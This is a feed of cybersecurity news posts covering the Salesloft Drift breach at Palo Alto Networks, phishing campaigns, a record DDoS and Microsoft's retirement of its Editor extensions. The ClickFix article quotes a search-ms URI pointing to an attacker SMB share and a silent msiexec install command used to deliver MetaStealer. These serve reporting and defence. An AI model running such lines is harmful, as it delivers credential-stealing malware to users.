• Cybersecurity vendor Palo Alto Networks disclosed that its Salesforce environment was breached through a compromised Salesloft Drift integration, marking the latest in a series of supply chain attacks targeting customer relationship management platforms. According to a statement from Palo Alto Networks, Salesloft’s Drift application—used by hundreds of organizations to streamline sales engagement—suffered an intrusion that […]

    The post Palo Alto Networks Confirms Data Breach via Compromised Salesforce Instances appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Google has firmly rejected widespread reports suggesting it issued a global security alert to its 2.5 billion Gmail users, calling such claims “entirely false”. The tech giant moved swiftly to clarify the situation after viral headlines sparked unnecessary panic among users worldwide. Recent reports circulated claiming that Google had sent out widespread notifications warning all […]

    The post Google Dismiss Reports of Major Gmail Security Alert appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly discovered spearphishing campaign is targeting executives and senior leadership across multiple industries by exploiting trusted OneDrive document‐sharing notifications. The Stripe OLT SOC has identified this sophisticated attack, which leverages highly tailored emails to impersonate internal HR communications and harvest corporate credentials through a convincing Microsoft Office/OneDrive login page. At the heart of the […]

    The post OneDrive Phishing Attack Targets Corporate Executives for Credential Theft appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A novel variant of the ClickFix attack has recently emerged, masquerading as a legitimate AnyDesk installer to spread the MetaStealer infostealer.

    This campaign exploits a fake Cloudflare Turnstile verification page to lure victims into executing a crafted Windows protocol handler, ultimately delivering a malicious MSI package disguised as a PDF.

    As organizations continue to harden their defenses against traditional social-engineering techniques, threat actors are evolving their playbooks, blending familiar lures with unexpected system components to bypass detection and steal sensitive credentials.

    In early August, users searching for the AnyDesk remote access tool encountered a deceptive landing page at anydeesk[.]ink/download/anydesk.html.

    The page displayed what appeared to be a standard Cloudflare Turnstile prompt, complete with a “verify you are human” button.

    The initial link that redirects users to a fake Cloudflare Turnstile (Source – Huntress)

    Upon clicking, victims were not guided to paste a command into the Run dialog box as in classic ClickFix attacks but instead redirected into Windows File Explorer via the search-ms URI handler.

    Huntress researchers noted that this subtle shift in redirection mechanism capitalized on the lesser-monitored Windows Search protocol, catching security teams off-guard.

    Windows File Explorer Redirection via search-ms (Source – Huntress)

    The infection chain unfolds when the search-ms URI invokes a remote SMB share, delivering a Windows shortcut file named “Readme Anydesk.pdf.lnk” to the victim’s system.

    Unlike FileFix variants that rely on clipboard-pasted PowerShell commands, this attack automatically launches the LNK payload, which in turn executes a script to download and install two components: the genuine AnyDesk installer hosted on Microsoft Edge for plausibility, and a decoy PDF served from chat1[.]store.

    The decoy file is in fact an MSI package that dynamically incorporates the victim’s hostname into its download URL by leveraging the %COMPUTERNAME% environment variable. Once downloaded, the MSI is installed via:-

    msiexec /i "%TEMP%\%%COMPUTERNAME%%.msi" /quiet

    After this command completes, metadata reveals two primary artifacts: a CustomActionDLL responsible for orchestrating the setup and a CAB archive containing ls26.exe, the MetaStealer dropper, and cleanup scripts.

    Displayname Parameter Revealing SMB Share (Source – Huntress)

    Huntress analysts identified that ls26.exe is protected with Private EXE Protector and exhibits characteristic behaviors of MetaStealer, including credential harvesting from browsers and crypto-wallet theft.

    Infection Mechanism

    At the heart of this campaign lies the ingenious use of Windows Search. By invoking the search-ms URI protocol, attackers bypass the Run dialog restrictions in hardened environments and introduce payloads directly through File Explorer.

    The following URI snippet illustrates the redirection:-

    search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\\attacker-smb\share

    Once the user confirms the File Explorer prompt, the LNK file silently executes the download routines. The MSI’s CustomActionDLL then triggers the retrieval of Binary.bz.WrappedSetupProgram, which unpacks ls26.exe and 1.js.

    The JavaScript file ensures the removal of intermediary files, while ls26.exe initiates the data exfiltration phase.

    By abusing legitimate Windows protocols and file handling, this attack evades sandbox detection and security alerts until the final payload unleashes its malicious logic.

    This emerging tactic underscores the importance of monitoring unconventional extensions of trusted system features.

    Defenders should consider implementing strict protocol handler policies, SMB auditing, and contextual analysis of MSI installations to detect and disrupt these sophisticated social-engineering campaigns.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post New ClickFix Attack Mimic as AnyDesk Leverages Windows Search to Drop MetaStealer appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Palo Alto Networks has confirmed that it was affected by a supply chain attack, resulting in the theft of customer data from its Salesforce instances.

    The breach originated from a compromised third-party application, Salesloft’s Drift, and did not affect any of Palo Alto Networks’ own products or services, which the company says remain secure.

    The cybersecurity firm announced that as soon as it became aware of the incident, it disconnected the vendor from its Salesforce environment and launched a full investigation led by its Unit 42 security team.

    The exposed data primarily consists of business contact information, internal sales account details, and basic customer case data. Palo Alto Networks stated it is in the process of contacting a “limited number of customers” whose potentially more sensitive data may have been exposed, Palo Alto Networks said.

    The widespread data theft campaign took place between August 8 and August 18, 2025. A threat actor, which Google’s Threat Intelligence Group tracks as UNC6395, leveraged compromised OAuth authentication tokens associated with the Salesloft Drift integration to gain unauthorized access and exfiltrate large volumes of data from corporate Salesforce environments.

    The supply chain attack originating from the compromised Salesloft Drift application has impacted other major technology companies, including cybersecurity firm Zscaler and Google.

    According to a threat brief from Unit 42, the attackers performed mass exfiltration from Salesforce objects, including Account, Contact, Case, and Opportunity records.

    The primary motive appears to be credential harvesting; after stealing the data, the hackers actively scanned it for secrets like passwords and access keys for other cloud services, such as Amazon Web Services (AWS) and Snowflake, to facilitate further attacks.

    Investigators noted that the actor used automated Python tools for the data theft and attempted to cover their tracks by deleting query logs.

    The incident has triggered a wide industry response. On August 20, Salesloft began notifying affected customers and, in collaboration with Salesforce, revoked all active access tokens for the Drift application to sever the connection.

    Salesforce also temporarily removed the Drift app from its AppExchange marketplace. Subsequent analysis from Google revealed the breach’s scope was broader than initially believed, potentially compromising all authentication tokens connected to the Drift platform, not just those integrated with Salesforce.

    Palo Alto Networks’ Unit 42 has urged all organizations using the Salesloft Drift integration to act with urgency. Recommendations include conducting a thorough review of Salesforce logs for suspicious activity, particularly for a user agent string associated with the attacker’s tools (Python/3.11 aiohttp/3.12.15), and immediately rotating any credentials or secrets that may have been stored in the compromised data.

    The security team also warned affected organizations to be vigilant against follow-up social engineering attempts and to reinforce security with Zero Trust principles.

    Salesloft Drift Supply Chain Attack

    In August 2025, a widespread data theft campaign abused compromised OAuth tokens associated with Salesloft’s Drift application, a popular AI-powered chatbot and customer engagement tool. A threat actor, tracked by Google as UNC6395, leveraged these tokens to gain unauthorized access to the Salesforce environments of hundreds of organizations between August 8 and August 18.

    The primary motive was credential harvesting. Attackers performed mass exfiltration of data from Salesforce objects—including customer accounts, contacts, and sales opportunities—and then scanned the stolen information for valuable secrets like AWS access keys, passwords, and Snowflake tokens to facilitate deeper network intrusions.

    Confirmed victims of this supply chain attack include:

    • Palo Alto Networks: The cybersecurity firm confirmed the exposure of business contact information and internal sales data from its CRM platform.
    • Zscaler: The cloud security company reported that customer information, including names, contact details, and some support case content, was accessed.
    • Google: In addition to being an investigator, Google confirmed a “very small number” of its Workspace accounts were accessed through the compromised tokens.

    In response, Salesloft and Salesforce collaborated to revoke all active Drift integration tokens and temporarily removed the app from the Salesforce AppExchange to contain the threat.

    “ShinyHunters” Salesforce Social Engineering Campaign

    Running parallel to the Salesloft incident is a broader, ongoing campaign attributed to a group known as “ShinyHunters” (or UNC6040). Since mid-2025, this group has successfully breached numerous major corporations by using sophisticated voice phishing, or “vishing,” tactics.

    In these attacks, threat actors impersonate IT support staff in phone calls to trick employees into granting them access to the company’s Salesforce instance, often by having the employee authorize a malicious Salesforce “Connected App”.

    This social engineering campaign has claimed a long list of victims, including :

    • Google: In June 2025, the group accessed a Salesforce system containing prospective Google Ads customer information.
    • Major Brands: Luxury and retail giants like LVMH (Louis Vuitton, Dior), Chanel, and Adidas were targeted.
    • Financial and Insurance: Companies including Allianz Life, Farmers Insurance, and, most recently, TransUnion have reported breaches linked to this campaign, with the TransUnion incident affecting 4.4 million U.S. consumers

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Palo Alto Networks Confirms Data Breach – Hackers Stole Customer Data from Salesforce Instances appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cloudflare disclosed that its automated defenses intercepted and neutralized a record-shattering Distributed Denial-of-Service (DDoS) assault peaking at 11.5 terabits per second (Tbps). The attack, characterized as a hyper-volumetric UDP flood, lasted just 35 seconds but set a new industry high for network bandwidth consumed by malicious traffic. Detailed analysis from Cloudflare shows that the majority […]

    The post Massive 11.5 Tbps UDP Flood DDoS Attack Originated From Google Cloud appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A comprehensive new report spanning 2010 to 2025 reveals the ever-evolving landscape of commercial spyware vendors (CSVs), exposing the methods these private firms employ to infiltrate devices, their typical targets, and the infection chains that deliver their covert implants. The study, produced by a leading cybersecurity intelligence firm, underscores the persistent threat posed by CSVs—from […]

    The post Mapping the Web of Commercial Spyware: Targets and Attack Chains appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • On August 29, 2025, Microsoft announced the retirement of its popular Microsoft Editor browser extensions for Microsoft Edge and Google Chrome

    The Editor extensions will be officially deprecated on October 31, 2025, as part of Microsoft’s strategy to integrate AI-powered writing assistance directly into the native proofing tools of Edge.

    Key Takeaways
    1. Editor extensions retirement Oct 31 2025; moved to Edge proofing.
    2. Zero admin setup; auto-enabled post-retirement.
    3. Powered by Azure OpenAI with Purview logging.

    Consolidation of AI-Powered Proofing Tools

    Microsoft Editor has long provided advanced grammar, spelling, and style suggestions through the Poplar Editor extensions on Edge and Chrome. 

    Going forward, these core capabilities, including real-time syntax parsing, context-aware style checks, and AI-driven rewrite suggestions, will no longer require a separate installation. 

    Instead, they will be natively embedded within Edge’s proofing engine, leveraging the browser’s integrated Natural Language Processing (NLP) and machine learning models.

    This change makes it easier for IT administrators and end users to deploy. There is no need to change any settings or Group Policy Objects (GPOs). The built-in proofing tools in Microsoft 365 will automatically provide the same or better functionality after the extensions are no longer used.

    Users will experience smarter suggestions powered by the latest Azure OpenAI inference services, all without the latency or compatibility overhead associated with browser add-ons.

    Action Required for IT Admins

    Retirement date is October 31, 2025. After this date, Popular Editor extensions will no longer receive updates or support and will cease functioning.

    Administrators do not need to deploy any updates or disable settings. The built-in proofing tool in Edge will assume all Editor responsibilities.

    Individuals can continue using Editor-Edge and Editor-Chrome extensions until the retirement date. 

    Post-retirement, grammar checks, spell correction, and style suggestions will be accessible directly from Edge’s settings under “Languages and proofreading.”

    Organizations that utilize Microsoft Purview for activity logging may need to adjust their monitoring policies since extension-specific telemetry will be consolidated into broader browser logs.

    Users are encouraged to familiarize themselves with Edge’s new proofing UI, which includes configurable options to enable or disable AI-driven suggestions, customize dictionaries, and review change histories. 

    Microsoft’s retirement of the Poplar Editor extensions underscores the company’s broader effort to unify AI services within core applications, reduce fragmentation, and streamline updates. 

    By embedding Editor functionality into Edge, Microsoft aims to deliver seamless, high-performance, and secure writing assistance without the need for separate browser extensions.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Microsoft to Kill Popular Editor Browser Extensions on Edge and Chrome appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Harsh Truths of AI Adoption MITs State of AI in Business report revealed that while 40% of organizations have purchased enterprise LLM subscriptions, over 90% of employees are actively using AI tools in their daily work. Similarly, research from Harmonic Security found that 45.4% of sensitive AI interactions are coming from personal email accounts, where employees are bypassing corporate

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated spear-phishing campaign that exploited a compromised mailbox belonging to the Ministry of Foreign Affairs of Oman. The operation, attributed to an Iranian-aligned group known as Homeland Justice and linked to Iran’s Ministry of Intelligence and Security (MOIS), masqueraded as legitimate multi-factor authentication (MFA) communications to infiltrate governments and diplomatic missions around the world. […]

    The post Iran-Nexus Hackers Exploit Omani Mailbox to Target Governments appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶